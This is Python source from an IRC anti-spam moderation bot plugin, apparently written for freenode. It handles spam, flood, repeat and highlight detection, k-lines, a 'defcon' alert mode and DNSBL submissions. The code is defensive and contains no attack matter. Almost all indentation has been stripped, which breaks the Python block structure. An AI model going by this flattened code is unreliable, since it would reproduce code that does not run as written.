if ircdb.checkCapability(msg.prefix, 'protected'):
if msg.nick in list(irc.state.channels[channel].ops) and irc.nick in text:
self.logChannel(irc,'OP: [%s] <%s> %s' % (channel,msg.nick,text))
continue
chan = self.getChan(irc,channel)
if chan.called:
if time.time() - chan.called > self.registryValue('abuseDuration',channel=channel):
chan.called = False
if not i.defcon:
self.logChannel(irc,'INFO: [%s] returns to regular state' % channel)
if irc.isChannel(channel) and self.registryValue('defconMode',channel=channel) and not i.defcon:
if 'z' in irc.state.channels[channel].modes and irc.nick in list(irc.state.channels[channel].ops) and not 'm' in irc.state.channels[channel].modes:
irc.queueMsg(ircmsgs.IrcMsg('MODE %s q' % channel))
if isBanned:
continue
if msg.nick in list(irc.state.channels[channel].ops):
if irc.nick in raw:
self.logChannel(irc,'OP: [%s] <%s> %s' % (channel,msg.nick,text))
continue
if self.registryValue('ignoreVoicedUser',channel=channel):
if msg.nick in list(irc.state.channels[channel].voices):
continue
protected = ircdb.makeChannelCapability(channel, 'protected')
if ircdb.checkCapability(msg.prefix, protected):
continue
if self.registryValue('ignoreRegisteredUser',channel=channel):
if msg.nick in chan.nicks and len(chan.nicks[msg.nick]) > 4:
if chan.nicks[msg.nick][4]:
continue
killReason = self.registryValue('killMessage',channel=channel)
if msg.nick in chan.nicks and len(chan.nicks[msg.nick]) > 4:
if chan.nicks[msg.nick][3] == "https://webchat.freenode.net":
hh = mask.split('@')[1]
mask = '*@%s' % hh
flag = ircdb.makeChannelCapability(channel, 'pattern')
if ircdb.checkCapability(msg.prefix, flag):
for k in i.patterns:
pattern = i.patterns[k]
if pattern.match(raw):
if pattern.limit == 0:
isBanned = True
uid = random.randint(0,1000000)
reason = '%s - matches #%s in %s' % (uid,pattern.uid,channel)
log = 'BAD: [%s] %s (matches #%s - %s)' % (channel,msg.prefix,pattern.uid,uid)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),reason,self.registryValue('klineMessage'),log,killReason)
i.count(self.getDb(irc.network),pattern.uid)
chan.klines.enqueue('%s %s' % (msg.nick.lower(),mask))
self.isAbuseOnChannel(irc,channel,'pattern',mask)
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
break
else:
queue = self.getIrcQueueFor(irc,mask,pattern.uid,pattern.life)
queue.enqueue(text)
if len(queue) > pattern.limit:
isBanned = True
uid = random.randint(0,1000000)
reason = '%s - matches #%s (%s/%ss) in %s' % (uid,pattern.uid,pattern.limit,pattern.life,channel)
log = 'BAD: [%s] %s (matches #%s %s/%ss - %s)' % (channel,msg.prefix,pattern.uid,pattern.limit,pattern.life,uid)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),reason,self.registryValue('klineMessage'),log,killReason)
self.rmIrcQueueFor(irc,mask)
i.count(self.getDb(irc.network),pattern.uid)
chan.klines.enqueue('%s %s' % (msg.nick.lower(),mask))
self.isAbuseOnChannel(irc,channel,'pattern',mask)
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
break
i.count(self.getDb(irc.network),pattern.uid)
if isBanned:
continue
if i.defcon and self.isChannelUniSpam(irc,msg,channel,mask,text):
isBanned = True
uid = random.randint(0,1000000)
reason = '!dnsbl UniSpam'
log = 'BAD: [%s] %s (%s - %s)' % (channel,msg.prefix,reason,uid)
chan.klines.enqueue('%s %s' % (msg.nick.lower(),mask))
reason = '%s - %s' % (uid,reason)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),reason,self.registryValue('klineMessage'),log,killReason)
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
i.defcon = time.time()
if isBanned:
continue
ignoreDuration = self.registryValue('ignoreDuration',channel=channel)
if not msg.nick in chan.nicks:
t = time.time()
if isCloaked(msg.prefix,self):
t = t - ignoreDuration - 1
chan.nicks[msg.nick] = [t,msg.prefix,mask]
isIgnored = False
if ignoreDuration > 0:
ts = chan.nicks[msg.nick][0]
if time.time()-ts > ignoreDuration:
isIgnored = True
reason = ''
publicreason = ''
if self.registryValue('joinSpamPartPermit',channel=channel) > -1:
kind = 'joinSpamPart'
life = self.registryValue('joinSpamPartLife',channel=channel)
key = mask
isNew = False
if not kind in chan.buffers:
chan.buffers[kind] = {}
if not key in chan.buffers[kind]:
isNew = True
chan.buffers[kind][key] = utils.structures.TimeoutQueue(life)
elif chan.buffers[kind][key].timeout != life:
chan.buffers[kind][key].setTimeout(life)
chan.buffers[kind][key].enqueue(key)
if not isIgnored and isNew and len(chan.buffers[kind][key]) == 1 and text.startswith('http') and time.time()-chan.nicks[msg.nick][0] < 15 and 'z' in irc.state.channels[channel].modes and channel == '#freenode':
publicreason = 'link spam once joined'
reason = 'linkspam'
badunicode = False
flag = ircdb.makeChannelCapability(channel,'badunicode')
if ircdb.checkCapability(msg.prefix,flag):
badunicode = self.isChannelUnicode(irc,msg,channel,mask,text)
if badunicode and self.hasAbuseOnChannel(irc,channel,'badunicode'):
isIgnored = False
if badunicode:
                    publicreason = 'unreadable unicode glyphs'
reason = badunicode
hilight = False
flag = ircdb.makeChannelCapability(channel, 'hilight')
if ircdb.checkCapability(msg.prefix, flag):
hilight = self.isChannelHilight(irc,msg,channel,mask,text)
if hilight and self.hasAbuseOnChannel(irc,channel,'hilight'):
isIgnored = False
if hilight:
publicreason = 'nicks/hilight spam'
reason = hilight
if chan.patterns and not len(reason):
for pattern in chan.patterns:
if pattern in text:
isIgnored = False
reason = 'matches tmp pattern in %s' % channel
publicreason = 'your sentence matches temporary blacklisted words'
chan.patterns.enqueue(pattern)
self.isAbuseOnChannel(irc,channel,'pattern',mask)
break
massrepeat = False
flag = ircdb.makeChannelCapability(channel, 'massRepeat')
if ircdb.checkCapability(msg.prefix, flag):
massrepeat = self.isChannelMassRepeat(irc,msg,channel,mask,text)
if massrepeat and self.hasAbuseOnChannel(irc,channel,'massRepeat'):
isIgnored = False
lowmassrepeat = False
flag = ircdb.makeChannelCapability(channel, 'lowMassRepeat')
if ircdb.checkCapability(msg.prefix, flag):
lowmassrepeat = self.isChannelLowMassRepeat(irc,msg,channel,mask,text)
if lowmassrepeat and self.hasAbuseOnChannel(irc,channel,'lowMassRepeat'):
isIgnored = False
repeat = False
flag = ircdb.makeChannelCapability(channel, 'repeat')
if ircdb.checkCapability(msg.prefix, flag):
repeat = self.isChannelRepeat(irc,msg,channel,mask,text)
if repeat and self.hasAbuseOnChannel(irc,channel,'repeat'):
isIgnored = False
lowrepeat = False
flag = ircdb.makeChannelCapability(channel, 'lowRepeat')
if ircdb.checkCapability(msg.prefix, flag):
lowrepeat = self.isChannelLowRepeat(irc,msg,channel,mask,text)
if lowrepeat and self.hasAbuseOnChannel(irc,channel,'lowRepeat'):
isIgnored = False
lowhilight = False
flag = ircdb.makeChannelCapability(channel, 'lowHilight')
if ircdb.checkCapability(msg.prefix, flag):
lowhilight = self.isChannelLowHilight(irc,msg,channel,mask,text)
if lowhilight and self.hasAbuseOnChannel(irc,channel,'lowHilight'):
isIgnored = False
flood = False
flag = ircdb.makeChannelCapability(channel, 'flood')
if ircdb.checkCapability(msg.prefix, flag):
flood = self.isChannelFlood(irc,msg,channel,mask,text)
if flood and self.hasAbuseOnChannel(irc,channel,'flood'):
isIgnored = False
lowflood = False
flag = ircdb.makeChannelCapability(channel, 'lowFlood')
if ircdb.checkCapability(msg.prefix, flag):
lowflood = self.isChannelLowFlood(irc,msg,channel,mask,text)
if lowflood and self.hasAbuseOnChannel(irc,channel,'lowFlood'):
isIgnored = False
ctcp = False
flag = ircdb.makeChannelCapability(channel, 'ctcp')
if ircdb.checkCapability(msg.prefix, flag):
if not ircmsgs.isAction(msg) and ircmsgs.isCtcp(msg):
ctcp = self.isChannelCtcp(irc,msg,channel,mask,text)
if ctcp and self.hasAbuseOnChannel(irc,channel,'ctcp'):
isIgnored = False
notice = False
flag = ircdb.makeChannelCapability(channel, 'notice')
if ircdb.checkCapability(msg.prefix, flag):
if not ircmsgs.isAction(msg) and isNotice:
notice = self.isChannelNotice(irc,msg,channel,mask,text)
if notice and self.hasAbuseOnChannel(irc,channel,'notice'):
isIgnored = False
cap = False
flag = ircdb.makeChannelCapability(channel, 'cap')
if ircdb.checkCapability(msg.prefix, flag):
cap = self.isChannelCap(irc,msg,channel,mask,raw)
if cap and self.hasAbuseOnChannel(irc,channel,'cap'):
isIgnored = False
if not reason:
if massrepeat:
reason = massrepeat
publicreason = 'repetition detected'
elif lowmassrepeat:
reason = lowmassrepeat
publicreason = 'repetition detected'
elif repeat:
reason = repeat
publicreason = 'repetition detected'
elif lowrepeat:
reason = lowrepeat
publicreason = 'repetition detected'
elif hilight:
reason = hilight
publicreason = 'nicks/hilight spam'
elif lowhilight:
reason = lowhilight
publicreason = 'nicks/hilight spam'
elif cap:
reason = cap
publicreason = 'uppercase detected'
elif flood:
reason = flood
publicreason = 'flood detected'
elif lowflood:
reason = lowflood
publicreason = 'flood detected'
elif ctcp:
reason = ctcp
publicreason = 'channel CTCP'
elif notice:
reason = notice
publicreason = 'channel notice'
if reason:
if isIgnored:
if self.warnedOnOtherChannel(irc,channel,mask):
isIgnored = False
elif self.isBadOnChannel(irc,channel,'bypassIgnore',mask):
isIgnored = False
if chan.called:
isIgnored = False
if isIgnored:
bypassIgnore = self.isBadOnChannel(irc,channel,'bypassIgnore',mask)
if bypassIgnore:
isBanned = True
uid = random.randint(0,1000000)
reason = '%s %s' % (reason,bypassIgnore)
log = 'BAD: [%s] %s (%s - %s)' % (channel,msg.prefix,reason,uid)
chan.klines.enqueue('%s %s' % (msg.nick.lower(),mask))
reason = '%s - %s' % (uid,reason)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),reason,self.registryValue('klineMessage'),log,killReason)
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
if i.defcon:
i.defcon = time.time()
else:
q = self.getIrcQueueFor(irc,mask,'warned-%s' % channel,self.registryValue('alertPeriod'))
if len(q) == 0:
q.enqueue(text)
self.logChannel(irc,'IGNORED: [%s] %s (%s)' % (channel,msg.prefix,reason))
matter = None
if msg.nick:
irc.queueMsg(ircmsgs.notice(msg.nick,"Your actions in %s tripped automated anti-spam measures (%s), but were ignored based on your time in channel. Stop now, or automated action will still be taken. If you have any questions, please don't hesitate to contact a member of staff" % (channel,publicreason)))
else:
isBanned = True
uid = random.randint(0,1000000)
log = 'BAD: [%s] %s (%s - %s)' % (channel,msg.prefix,reason,uid)
chan.klines.enqueue('%s %s' % (msg.nick.lower(),mask))
reason = '%s - %s' % (uid,reason)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),reason,self.registryValue('klineMessage'),log,killReason)
if i.defcon:
i.defcon = time.time()
if chan.called:
chan.called = time.time()
if i.lastDefcon and time.time()-i.lastDefcon < self.registryValue('alertPeriod') and not i.defcon:
                            self.logChannel(irc,"INFO: ignores lifted and abuses lead to klines for %ss due to abuses in %s after latest defcon %s" % (self.registryValue('defcon')*2,channel,i.lastDefcon))
i.defcon = time.time() + (self.registryValue('defcon')*2)
if not i.god:
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +p' % irc.nick))
else:
self.applyDefcon(irc)
ip = mask.split('@')[1]
if hilight and i.defcon:
if utils.net.bruteIsIPV6(ip) or utils.net.isIPV4(ip):
if len(self.registryValue('droneblKey')) and len(self.registryValue('droneblHost')) and self.registryValue('enable'):
t = world.SupyThread(target=self.fillDnsbl,name=format('fillDnsbl %s', ip),args=(irc,ip,self.registryValue('droneblHost'),self.registryValue('droneblKey'),reason))
t.setDaemon(True)
t.start()
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
if not isBanned:
mini = self.registryValue('amsgMinimum')
if len(text) > mini or text.find('http') != -1:
limit = self.registryValue('amsgPermit')
if limit > -1:
life = self.registryValue('amsgLife')
percent = self.registryValue('amsgPercent')
queue = self.getIrcQueueFor(irc,mask,channel,life)
queue.enqueue(text)
found = None
for ch in i.channels:
chc = self.getChan(irc,ch)
if msg.nick in chc.nicks and ch != channel:
queue = self.getIrcQueueFor(irc,mask,ch,life)
for m in queue:
if compareString(m,text) > percent:
found = ch
break
if found:
break
if found:
queue = self.getIrcQueueFor(irc,mask,'amsg',life)
flag = False
for q in queue:
if found in q:
flag = True
break
if not flag:
queue.enqueue(found)
if len(queue) > limit:
chs = list(queue)
queue.reset()
key = 'amsg %s' % mask
q = self.getIrcQueueFor(irc,key,'amsg',self.registryValue('alertPeriod'))
if len(q) == 0:
q.enqueue(mask)
chs.append(channel)
self.logChannel(irc,'AMSG: %s (%s) in %s' % (msg.nick,text,', '.join(chs)))
for channel in i.channels:
chan = self.getChan(irc,channel)
life = self.registryValue('computedPatternLife',channel=channel)
if not chan.patterns:
chan.patterns = utils.structures.TimeoutQueue(life)
elif chan.patterns.timeout != life:
chan.patterns.setTimeout(life)
chan.patterns.enqueue(text.lower())
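# Parses services snoop output from the secret channel: klinechan hits, registration e-mails, AKICK abuse
# and e-mail changes, feeding the DNSBL and the mxbl resolver as needed.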
def handleSecretMessage (self,irc,msg):
(targets, text) = msg.args
nicks = ['OperServ','NickServ']
i = self.getIrc(irc)
if msg.nick in nicks:
if text.startswith('klinechan_check_join(): klining '):
patterns = self.registryValue('droneblPatterns')
found = False
if len(patterns):
for pattern in patterns:
if len(pattern) and pattern in text:
found = pattern
break
if found:
a = text.split('klinechan_check_join(): klining ')[1].split(' ')
a = a[0]
ip = a.split('@')[1]
if utils.net.isIPV4(ip) or utils.net.bruteIsIPV6(ip):
if len(self.registryValue('droneblKey')) and len(self.registryValue('droneblHost')) and self.registryValue('enable'):
t = world.SupyThread(target=self.fillDnsbl,name=format('fillDnsbl %s', ip),args=(irc,ip,self.registryValue('droneblHost'),self.registryValue('droneblKey'),found))
t.setDaemon(True)
t.start()
else:
self.prefixToMask(irc,'*!*@%s' % ip,'',True)
if text.startswith('sendemail():') and self.registryValue('registerPermit') > 0:
text = text.replace('sendemail():','')
pattern = r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
result = re.search(pattern,text)
email = text.split('<')[1].split('>')[0]
h = text.split('email for ')[1].split(']')[0].strip().replace('[','!')
if result:
ip = result.group(0)
if ip and 'type register to' in text:
q = self.getIrcQueueFor(irc,ip,'register',self.registryValue('registerLife'))
q.enqueue(email)
if len(q) > self.registryValue('registerPermit'):
ms = []
for m in q:
ms.append(m)
if i.defcon:
uid = random.randint(0,1000000)
m = self.prefixToMask(irc,h)
                                self.ban(irc,h.split('!')[0],h,m,self.registryValue('klineDuration'),'%s - services load with %s' % (uid,','.join(ms)),self.registryValue('klineMessage'),'BAD: %s (registered load of accounts - %s)' % (h,uid))
else:
self.logChannel(irc,'SERVICE: %s load of accounts %s' % (h,', '.join(ms)))
if 'type register to' in text:
q = self.getIrcQueueFor(irc,email,'register',self.registryValue('registerLife'))
text = text.replace('email for ','')
text = text.split(' type register')[0]
q.enqueue(text.strip())
if len(q) > self.registryValue('registerPermit'):
ms = []
for m in q:
                            ms.append(m)
self.logChannel(irc,'SERVICE: loads of registration to %s (%s)' % (email,', '.join(ms)))
if 'AKICK:ADD:' in text or 'AKICK:DEL:' in text:
life = self.registryValue('decloakLife')
limit = self.registryValue('decloakPermit')
if limit > -1:
origin = text.split(' ')[0]
target = text.split(' ').pop()
q = self.getIrcQueueFor(irc,origin,target,life)
q.enqueue(text)
if len(q) > limit:
q.reset()
self.logChannel(irc,'SERVICE: [%s] %s suspicious AKICK behaviour' % (target,origin))
if 'VERIFY:EMAILCHG:' in text:
account = text.split(' VERIFY:EMAILCHG')[0]
email = text.split('(email: ')[1].split(')')[0].split('@')[1]
t = world.SupyThread(target=self.resolveSnoopy,name=format('Snoopy %s', email),args=(irc,account,email,True,True))
t.setDaemon(True)
t.start()
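# Handles messages from the reportNicks bots: a wave of BAD reports raises defcon, and suspicious-client or
# lethal-mask notices matching droneblPatterns lead to k-lines or DNSBL submissions.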
def handleReportMessage (self,irc,msg):
(targets, text) = msg.args
nicks = self.registryValue('reportNicks')
if msg.nick in nicks:
i = self.getIrc(irc)
if text.startswith('BAD:') and not '(tor' in text and '(' in text:
permit = self.registryValue('reportPermit')
if permit > -1:
life = self.registryValue('reportLife')
queue = self.getIrcQueueFor(irc,'report','bad',life)
target = text.split('(')[0]
if len(text.split(' ')) > 1:
target = text.split(' ')[1]
found = False
for q in queue:
if q == target:
found = True
break
if not found:
queue.enqueue(target)
if len(queue) > permit:
queue.reset()
if not i.defcon:
self.logChannel(irc,"BOT: Wave in progress (%s/%ss), ignores lifted, triggers thresholds lowered for %ss at least" % (self.registryValue('reportPermit'),self.registryValue('reportLife'),self.registryValue('defcon')))
i.defcon = time.time()
if not i.god:
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +p' % irc.nick))
else:
self.applyDefcon (irc)
i.defcon = time.time()
else:
if i.netsplit and text.startswith('Join rate in '):
i.netsplit = time.time() + self.registryValue('netsplitDuration')
if text.startswith('Client ') and 'suspicious' in text and i.defcon:
text = text.replace('Client ','')
hostmask = text.split(' ')[0].replace('(','!').replace(')','')
if ircutils.isUserHostmask(hostmask):
mask = self.prefixToMask(irc,hostmask)
(nick,ident,host) = ircutils.splitHostmask(hostmask)
patterns = self.registryValue('droneblPatterns')
found = False
if len(patterns):
for pattern in patterns:
if len(pattern) and pattern in text:
found = pattern
break
if found:
def k():
self.kline(irc,hostmask,mask,self.registryValue('klineDuration'),'!dnsbl (%s in suspicious mask)' % found)
schedule.addEvent(k,time.time()+random.uniform(1, 6))
if text.startswith('Killing client ') and 'due to lethal mask ' in text:
patterns = self.registryValue('droneblPatterns')
found = False
if len(patterns):
for pattern in patterns:
if len(pattern) and pattern in text:
found = pattern
break
if found:
a = text.split('Killing client ')[1]
a = a.split(')')[0]
ip = a.split('@')[1]
if utils.net.isIPV4(ip) or utils.net.bruteIsIPV6(ip):
if len(self.registryValue('droneblKey')) and len(self.registryValue('droneblHost')) and self.registryValue('enable'):
t = world.SupyThread(target=self.fillDnsbl,name=format('fillDnsbl %s', ip),args=(irc,ip,self.registryValue('droneblHost'),self.registryValue('droneblKey'),found))
t.setDaemon(True)
t.start()
else:
self.prefixToMask(irc,'*!*@%s' % ip,'',True,found)
def doPrivmsg (self,irc,msg):
self.handleMsg(irc,msg,False)
try:
i = self.getIrc(irc)
mask = self.prefixToMask(irc,msg.prefix)
(targets, text) = msg.args
if ircdb.checkCapability(msg.prefix, 'protected'):
return
for channel in targets.split(','):
if channel.startswith('@'):
channel = channel.replace('@','',1)
if channel.startswith('+'):
channel = channel.replace('+','',1)
if not irc.isChannel(channel) and channel == irc.nick:
killReason = self.registryValue('killMessage',channel=channel)
for k in i.patterns:
pattern = i.patterns[k]
if pattern.match(text):
if pattern.limit == 0:
uid = random.randint(0,1000000)
                                reason = '%s - matches #%s in pm' % (uid,pattern.uid)
log = 'BAD: [%s] %s (matches #%s - %s)' % (channel,msg.prefix,pattern.uid,uid)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),reason,self.registryValue('klineMessage'),log,killReason)
i.count(self.getDb(irc.network),pattern.uid)
break
else:
queue = self.getIrcQueueFor(irc,mask,pattern.uid,pattern.life)
queue.enqueue(text)
if len(queue) > pattern.limit:
uid = random.randint(0,1000000)
                                    reason = '%s - matches #%s (%s/%ss) in pm' % (uid,pattern.uid,pattern.limit,pattern.life)
log = 'BAD: [%s] %s (matches #%s %s/%ss - %s)' % (channel,msg.prefix,pattern.uid,pattern.limit,pattern.life,uid)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),reason,self.registryValue('klineMessage'),log,killReason)
self.rmIrcQueueFor(irc,mask)
i.count(self.getDb(irc.network),pattern.uid)
break
i.count(self.getDb(irc.network),pattern.uid)
except:
return
def doTopic(self, irc, msg):
self.handleMsg(irc,msg,False)
def do903 (self,irc,msg):
irc.queueMsg(ircmsgs.IrcMsg('CAP REQ :extended-join account-notify'))
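# Parses 'Possible Flooder' server notices: tracks flooders per target channel or user and k-lines or
# announces them once the configured thresholds are exceeded.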
def handleFloodSnote (self,irc,text):
user = text.split('Possible Flooder ')[1]
a = user[::-1]
ar = a.split(']',1)
ar.reverse()
ar.pop()
user = "%s" % ar[0]
user = user.replace('[','!',1)
user = '%s' % user[::-1]
if not ircutils.isUserHostmask(user):
return
target = text.split('target: ')[1]
i = self.getIrc(irc)
if irc.isChannel(target):
limit = self.registryValue('channelFloodPermit')
life = self.registryValue('channelFloodLife')
key = 'snoteFloodAlerted'
if limit > -1:
if not self.registryValue('ignoreChannel',target):
protected = ircdb.makeChannelCapability(target, 'protected')
if not ircdb.checkCapability(user, protected):
queue = self.getIrcQueueFor(irc,target,'snoteFlood',life)
if i.defcon:
if limit > 0:
limit = limit - 1
stored = False
for u in queue:
if u == user:
stored = True
break
if not stored:
queue.enqueue(user)
users = list(queue)
if len(queue) > limit:
self.logChannel(irc,'NOTE: [%s] is flooded by %s' % (target,', '.join(users)))
queue.reset()
queue = self.getIrcQueueFor(irc,target,'snoteFloodJoin',life)
queue.enqueue(text)
if len(queue) > 1 or i.defcon:
if self.registryValue('lastActionTaken',channel=target) > 0.0 and not target in irc.state.channels:
for user in users:
if not 'gateway/web/' in user:
mask = self.prefixToMask(irc,user)
uid = random.randint(0,1000000)
self.kline(irc,user,mask,self.registryValue('klineDuration'),'%s - snote flood on %s' % (uid,target))
self.logChannel(irc,"BAD: %s (snote flood on %s - %s)" % (user,target,uid))
t = time.time() - (self.registryValue('leaveChannelIfNoActivity',channel=target) * 24 * 3600) + 1800
self.setRegistryValue('lastActionTaken',t,channel=target)
irc.sendMsg(ircmsgs.join(target))
self.logChannel(irc,"JOIN: [%s] due to flood snote" % target)
try:
network = conf.supybot.networks.get(irc.network)
network.channels().add(target)
except KeyError:
pass
queue.reset()
else:
limit = self.registryValue('userFloodPermit')
life = self.registryValue('userFloodLife')
if limit > -1:
if target.startswith('freenode-connect'):
return
queue = self.getIrcQueueFor(irc,target,'snoteFlood',life)
stored = False
for u in queue:
if u == user:
stored = True
break
if not stored:
queue.enqueue(user)
users = list(queue)
if len(queue) > limit:
queue.reset()
queue = self.getIrcQueueFor(irc,target,'snoteFloodLethal',life)
queue.enqueue(','.join(users))
if i.defcon or len(queue) > 1:
for m in queue:
for q in m.split(','):
if not (ircdb.checkCapability(q, 'protected') or target == 'freenode-connect'):
mask = self.prefixToMask(irc,q)
uid = random.randint(0,1000000)
self.kline(irc,q,mask,self.registryValue('klineDuration'),'%s - snote flood on %s' % (uid,target))
self.logChannel(irc,"BAD: %s (snote flood on %s - %s)" % (q,target,uid))
else:
self.logChannel(irc,'NOTE: %s is flooded by %s' % (target,', '.join(users)))
if ircdb.checkCapability(user, 'protected'):
return
queue = self.getIrcQueueFor(irc,user,'snoteFlood',life)
stored = False
for u in queue:
if u == target:
stored = True
break
if not stored:
queue.enqueue(target)
if len(queue)> limit:
targets = list(queue)
queue.reset()
queue = self.getIrcQueueFor(irc,user,'snoteFloodLethal',life)
queue.enqueue(target)
if i.defcon or len(queue) > 1:
mask = self.prefixToMask(irc,user)
uid = random.randint(0,1000000)
self.kline(irc,user,mask,self.registryValue('klineDuration'),'%s - snote flood %s' % (uid,','.join(targets)))
self.logChannel(irc,"BAD: %s (snote flood %s - %s)" % (user,','.join(targets),uid))
else:
self.logChannel(irc,'NOTE: %s is flooding %s' % (user,', '.join(targets)))
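# Parses join/part spam server notices: announces channels being join-flooded and k-lines clients that
# crawl (join/part) across too many channels.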
def handleJoinSnote (self,irc,text):
limit = self.registryValue('joinRatePermit')
life = self.registryValue('joinRateLife')
target = text.split('trying to join ')[1].split(' is')[0]
if self.registryValue('ignoreChannel',target):
return
user = text.split('User ')[1].split(')')[0]
user = user.replace('(','!').replace(')','').replace(' ','')
if not ircutils.isUserHostmask(user):
return
mask = self.prefixToMask(irc,user)
if ircdb.checkCapability(user, 'protected'):
return
protected = ircdb.makeChannelCapability(target, 'protected')
if ircdb.checkCapability(user, protected):
return
queue = self.getIrcQueueFor(irc,user,'snoteJoin',life)
stored = False
for u in queue:
if u == user:
stored = True
break
if not stored:
queue.enqueue(user)
i = self.getIrc(irc)
key = 'snoteJoinAlerted'
if len(queue) > limit and limit > 0:
users = list(queue)
queue.reset()
queue = self.getIrcQueueFor(irc,user,'snoteJoinAlert',self.registryValue('alertPeriod'))
if len(queue):
self.logChannel(irc,'NOTE: [%s] join/part by %s' % (target,', '.join(users)))
queue.enqueue(','.join(users))
life = self.registryValue('crawlLife')
limit = self.registryValue('crawlPermit')
if limit < 0:
return
queue = self.getIrcQueueFor(irc,mask,'snoteJoin',life)
stored = False
for u in queue:
if u == target:
stored = True
break
if not stored:
queue.enqueue(target)
if '1wm' in user:
limit = 1
if len(queue) > limit:
channels = list(queue)
queue.reset()
queue = self.getIrcQueueFor(irc,mask,'snoteJoinLethal',self.registryValue('alertPeriod'))
if len(queue) == 0:
self.logChannel(irc,'NOTE: %s is indexing the network (%s)' % (user,', '.join(channels)))
queue.enqueue(mask)
else:
self.kline(irc,user,mask,self.registryValue('klineDuration'),'crawling')
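# Parses 'failed login attempts' server notices: k-lines hosts flooding NickServ identification, whether one
# host hits many accounts or many hosts hit one account.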
def handleIdSnote (self,irc,text):
target = text.split('failed login attempts to ')[1].split('.')[0].strip()
user = text.split('Last attempt received from ')[1].split(' on')[0].strip()
if not ircutils.isUserHostmask(user):
return
if user.split('!')[0].lower() == target.lower():
return
limit = self.registryValue('idPermit')
life = self.registryValue('idLife')
if limit < 0:
return
queue = self.getIrcQueueFor(irc,user,'snoteId',life)
queue.enqueue(target)
i = self.getIrc(irc)
targets = []
key = 'snoteIdAlerted'
if len(queue) > limit:
targets = list(queue)
queue.reset()
if not key in i.queues[user]:
def rcu():
i = self.getIrc(irc)
if user in i.queues:
if key in i.queues[user]:
del i.queues[user][key]
i.queues[user][key] = time.time()
schedule.addEvent(rcu,time.time()+self.registryValue('abuseLife'))
if key in i.queues[user]:
if len(queue):
targets = list(queue)
queue.reset()
a = []
for t in targets:
if not t in a:
a.append(t)
mask = self.prefixToMask(irc,user)
(nick,ident,host) = ircutils.splitHostmask(user)
if not mask in i.klines:
uid = random.randint(0,1000000)
privateReason = '%s - ns id flood (%s)' % (uid,', '.join(a))
if i.defcon:
privateReason = '!dnsbl ' + privateReason
self.kline(irc,user,mask,self.registryValue('klineDuration'), privateReason)
self.logChannel(irc,"BAD: %s (%s)" % (user,privateReason))
queue = self.getIrcQueueFor(irc,target,'snoteId',life)
queue.enqueue(user)
targets = []
if len(queue) > limit:
targets = list(queue)
queue.reset()
def rct():
i = self.getIrc(irc)
if target in i.queues:
if key in i.queues[target]:
del i.queues[target][key]
i.queues[target][key] = time.time()
schedule.addEvent(rct,time.time()+self.registryValue('abuseLife'))
if key in i.queues[target]:
if len(queue):
targets = list(queue)
queue.reset()
a = {}
for t in targets:
if not t in a:
a[t] = t
for u in a:
mask = self.prefixToMask(irc,u)
(nick,ident,host) = ircutils.splitHostmask(u)
if not mask in i.klines:
self.kill(irc,nick,self.registryValue('killMessage'))
uid = random.randint(0,1000000)
privateReason = '%s - ns id flood on %s' % (uid,target)
if i.defcon:
privateReason = '!dnsbl ' + privateReason
self.kline(irc,u,mask,self.registryValue('klineDuration'), privateReason)
self.logChannel(irc,"BAD: %s (%s)" % (u,privateReason))
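# On 'KLINE active' server notices: logs the account of k-lined users (for staff klines) and warns when a
# single ban appears to hit more than alertOnWideKline users in the same IP range.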
def handleKline(self,irc,text):
i = self.getIrc(irc)
user = text.split('active for')[1]
a = user[::-1]
ar = a.split(']',1)
ar.reverse()
ar.pop()
user = "%s" % ar[0]
user = user.replace('[','!',1)
user = '%s' % user[::-1]
user = user.strip()
if not ircutils.isUserHostmask(user):
return
(nick,ident,host) = ircutils.splitHostmask(user)
permit = self.registryValue('alertOnWideKline')
found = ''
if not i.lastKlineOper.find('freenode/staff/') == -1:
for channel in i.channels:
chan = i.channels[channel]
ns = []
if nick in chan.nicks:
if len(chan.nicks[nick]) == 5:
if chan.nicks[nick][4] and chan.nicks[nick][1] == user:
found = chan.nicks[nick][4]
break
if found:
self.log.info ('Account klined %s --> %s' % (found,user))
if permit > -1:
if '/' in host:
if host.startswith('gateway/') or host.startswith('nat/'):
h = host.split('/')
h[-1] = '*'
host = '/'.join(h)
ranges = self._ip_ranges(host)
announced = False
for range in ranges:
queue = self.getIrcQueueFor(irc,range,'klineNote',7)
queue.enqueue(user)
if len(queue) == permit:
if not announced:
announced = True
self.logChannel(irc,"NOTE: a kline similar to *@%s seems to hit more than %s users" % (range,self.registryValue('alertOnWideKline')))
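# During defcon, k-lines clients changing nick more than nickChangePermit times within nickChangeLife seconds.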
def handleNickSnote (self,irc,text):
text = text.replace('Nick change: From ','')
text = text.split(' to ')[1]
nick = text.split(' ')[0]
host = text.split(' ')[1]
host = host.replace('[','',1)
host = host[:-1]
limit = self.registryValue('nickChangePermit')
life = self.registryValue('nickChangeLife')
if limit < 0:
return
mask = self.prefixToMask(irc,'%s!%s' % (nick,host))
i = self.getIrc(irc)
if not i.defcon:
return
queue = self.getIrcQueueFor(irc,mask,'snoteNick',life)
queue.enqueue(nick)
if len(queue) > limit:
nicks = list(queue)
queue.reset()
uid = random.randint(0,1000000)
self.kline(irc,'%s!%s' % (nick,host),mask,self.registryValue('klineDuration'),'%s - nick changes abuses %s/%ss' % (uid,limit,life))
self.logChannel(irc,"BAD: %s abuses nick change (%s - %s)" % (mask,','.join(nicks),uid))
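# Watches channel-creation notices for names matching lethalChannels, marks the creator for k-lining and WHOISes them.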
def handleChannelCreation (self,irc,text):
text = text.replace(' is creating new channel ','')
permit = self.registryValue('channelCreationPermit')
user = text.split('#')[0]
channel = '#' + text.split('#')[1]
if '##' in text:
channel = '##' + text.split('##')[1]
